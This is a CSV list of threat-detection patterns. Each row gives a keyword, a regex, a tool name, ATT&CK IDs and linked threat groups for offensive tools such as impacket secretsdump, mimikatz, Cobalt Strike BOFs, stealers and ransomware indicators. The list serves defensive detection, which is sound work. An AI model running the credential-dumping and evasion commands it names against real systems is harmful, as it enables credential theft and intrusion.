"*SeCreatePagefilePrivilegePoC.exe*",".{0,1000}SeCreatePagefilePrivilegePoC\.exe.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","58293"
"*SeCreateTokenPrivilegePoC.exe*",".{0,1000}SeCreateTokenPrivilegePoC\.exe.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","58294"
"*secrect_key = ""iamafuckingnerd""*",".{0,1000}secrect_key\s\=\s\""iamafuckingnerd\"".{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","#content","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","58295"
"*secredump.exe*",".{0,1000}secredump\.exe.{0,1000}","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","N/A","10","5","421","53","2025-01-04T14:16:46Z","2022-02-15T20:51:46Z","58296"
"*secret_fragment_exploit.py */_fragment*",".{0,1000}secret_fragment_exploit\.py\s.{0,1000}\/_fragment.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","58297"
"*SecretFinder.py*",".{0,1000}SecretFinder\.py.{0,1000}","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","N/A","10","2153","405","2024-05-26T09:36:41Z","2020-06-08T10:50:12Z","58298"
"*SecretFinder-master.zip*",".{0,1000}SecretFinder\-master\.zip.{0,1000}","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","N/A","10","2153","405","2024-05-26T09:36:41Z","2020-06-08T10:50:12Z","58299"
"*secrets/secrets_manager/secrets.txt*",".{0,1000}secrets\/secrets_manager\/secrets\.txt.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","58300"
"*secrets_dump*",".{0,1000}secrets_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","58301"
"*secrets_dump_dcsync*",".{0,1000}secrets_dump_dcsync.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","58302"
"*secretsdump *--silent*",".{0,1000}secretsdump\s.{0,1000}\-\-silent.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","58303"
"*secretsdump -sam *",".{0,1000}secretsdump\s\-sam\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","58304"
"*secretsdump*",".{0,1000}secretsdump.{0,1000}","offensive_tool_keyword","POC","Zerologon CVE exploitation (could be other malicious tools too)","T1210 - T1068","TA0001","N/A","N/A","Exploitation tool","https://github.com/risksense/zerologon","1","1","N/A","N/A","N/A","7","657","146","2020-10-15T18:31:15Z","2020-09-14T19:19:07Z","58305"
"*secretsdump.*.pyc*",".{0,1000}secretsdump\..{0,1000}\.pyc.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","58306"
"*secretsdump.py*",".{0,1000}secretsdump\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","58307"
"*secretsdump.py*",".{0,1000}secretsdump\.py.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","1","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","58308"
"*secretsdump.py*",".{0,1000}secretsdump\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Credential Access","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","58309"
"*secretsdump.py*",".{0,1000}secretsdump\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","58310"
"*secretsdump.py*",".{0,1000}secretsdump\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","58311"
"*secretsdump.py*",".{0,1000}secretsdump\.py.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","58312"
"*secretsdump.py*",".{0,1000}secretsdump\.py.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","58313"
"*secretsdump.py*",".{0,1000}secretsdump\.py.{0,1000}","offensive_tool_keyword","noPac","script used in the POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","0","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","58314"
"*secretsdump.py*",".{0,1000}secretsdump\.py.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213 - T1649","TA0006 - TA0008 - TA0009","N/A","Black Basta","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","1","N/A","N/A","10","7","618","76","2024-07-08T22:37:30Z","2022-04-29T09:08:32Z","58315"
"*secretsdump.py*",".{0,1000}secretsdump\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","58316"
"*secretsdump.py*",".{0,1000}secretsdump\.py.{0,1000}","offensive_tool_keyword","secretsdump","secretdump.py from impacket - https://github.com/fortra/impacket","T1003.003","TA0006","Operation Wocao","Black Basta - Rhysida - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - ALLANITE","Credential Access","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","58317"
"*secretsdump.py*",".{0,1000}secretsdump\.py.{0,1000}","offensive_tool_keyword","SharpSecDump",".Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py","T1003 - T1558","TA0006","N/A","Dispossessor","Credential Access","https://github.com/G0ldenGunSec/SharpSecDump","1","1","N/A","N/A","10","7","609","74","2023-02-16T18:47:26Z","2020-09-01T04:30:24Z","58318"
"*secretsquirrel/the-backdoor-factory*",".{0,1000}secretsquirrel\/the\-backdoor\-factory.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE  ELF  Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","58319"
"*SecScanC2_admin *",".{0,1000}SecScanC2_admin\s.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","0","#P2P","N/A","10","","N/A","","","","58320"
"*SecScanC2_admin_*",".{0,1000}SecScanC2_admin_.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","1","#P2P","N/A","10","","N/A","","","","58321"
"*SecScanC2_node *",".{0,1000}SecScanC2_node\s.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","0","#P2P","N/A","10","","N/A","","","","58322"
"*SecScanC2_node_*",".{0,1000}SecScanC2_node_.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","1","#P2P","N/A","10","","N/A","","","","58323"
"*SecScanC2-main*",".{0,1000}SecScanC2\-main.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","1","#P2P","N/A","10","","N/A","","","","58324"
"*sec-shinject *",".{0,1000}sec\-shinject\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/apokryptein/secinject","1","0","N/A","N/A","10","10","94","23","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z","58325"
"*securesean/DecryptAutoLogon*",".{0,1000}securesean\/DecryptAutoLogon.{0,1000}","offensive_tool_keyword","DecryptAutoLogon","Command line tool to extract/decrypt the password that was stored in the LSA by SysInternals AutoLogon","T1003.001 - T1555.003 - T1003.006","TA0006","N/A","N/A","Credential Access","https://github.com/securesean/DecryptAutoLogon","1","1","N/A","N/A","10","3","218","32","2020-12-05T16:14:28Z","2020-12-03T20:38:59Z","58326"
"*securesocketfunneling*",".{0,1000}securesocketfunneling.{0,1000}","offensive_tool_keyword","securesocketfunneling","Secure Socket Funneling (SSF) is a network tool and toolkit It provides simple and efficient ways to forward data from multiple sockets (TCP or UDP) through a single secure TLS link to a remote computer","T1071.001 - T1573 - T1572","TA0003 - TA0009 - TA0011 ","N/A","N/A","C2","https://securesocketfunneling.github.io/ssf/#home","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","58327"
"*security-onion*",".{0,1000}security\-onion.{0,1000}","offensive_tool_keyword","security-onion","Security Onion is a free and open source Linux distribution for threat hunting. enterprise security monitoring. and log management. It includes Elasticsearch. Logstash. Kibana. Snort. Suricata. Bro. Wazuh. Sguil. Squert. NetworkMiner. and many other security tools. The easy-to-use Setup wizard allows you to build an army of distributed sensors for your enterprise in minutes","T1059 - T1059.001 - T1059.003 - T1059.004","TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Exploitation OS","https://github.com/Security-Onion-Solutions/security-onion","1","1","N/A","N/A","N/A","10","3085","523","2021-04-16T12:14:31Z","2015-03-24T20:15:23Z","58328"
"*securityRook@onionmail.org*",".{0,1000}securityRook\@onionmail\.org.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","58329"
"*securycore/Ikeext-Privesc*",".{0,1000}securycore\/Ikeext\-Privesc.{0,1000}","offensive_tool_keyword","Ikeext-Privesc","Windows IKEEXT DLL Hijacking Exploit Tool","T1546.011 - T1574.009 - T1036.004","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/securycore/Ikeext-Privesc","1","1","N/A","N/A","10","1","33","52","2018-02-25T13:45:15Z","2018-02-27T11:18:56Z","58330"
"*SecUser1/Necro-Stealer*",".{0,1000}SecUser1\/Necro\-Stealer.{0,1000}","offensive_tool_keyword","Necro-Stealer","C++ stealer (passwords - cookies - forms - cards - wallets) ","T1078 - T1114 - T1555 - T1539 - T1212 - T1132","TA0006  - TA0010","N/A","N/A","Credential Access","https://github.com/SecUser1/Necro-Stealer","1","1","N/A","N/A","8","1","6","1","2022-12-06T16:06:55Z","2022-12-06T15:52:17Z","58331"
"*SecUser1/PredatorTheStealer*",".{0,1000}SecUser1\/PredatorTheStealer.{0,1000}","offensive_tool_keyword","PredatorTheStealer","C++ stealer (passwords - cookies - forms - cards - wallets) ","T1078 - T1114 - T1555 - T1539 - T1212 - T1132","TA0006  - TA0010","N/A","N/A","Credential Access","https://github.com/SecUser1/PredatorTheStealer","1","1","N/A","N/A","8","1","11","2","2022-12-06T16:46:33Z","2022-12-06T16:34:43Z","58332"
"*secxrosqawaefsio3biv2dmi2c5yunf3t7ilwf54czq3v4bi7w6mbfad.onion*",".{0,1000}secxrosqawaefsio3biv2dmi2c5yunf3t7ilwf54czq3v4bi7w6mbfad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","58333"
"*sed -i -e 's/ArgumentPtr/NotTodayPal/*",".{0,1000}sed\s\-i\s\-e\s\'s\/ArgumentPtr\/NotTodayPal\/.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/projectb-temp/mimidogz","1","0","N/A","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z","58334"
"*SeDebugPrivilegePoC.exe*",".{0,1000}SeDebugPrivilegePoC\.exe.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","58336"
"*SeeYouCM-Thief.git*",".{0,1000}SeeYouCM\-Thief\.git.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","1","N/A","N/A","9","2","189","35","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z","58337"
"*SeeYouCM-Thief-main*",".{0,1000}SeeYouCM\-Thief\-main.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","1","N/A","N/A","9","2","189","35","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z","58338"
"*sekurlsa *",".{0,1000}sekurlsa\s.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58339"
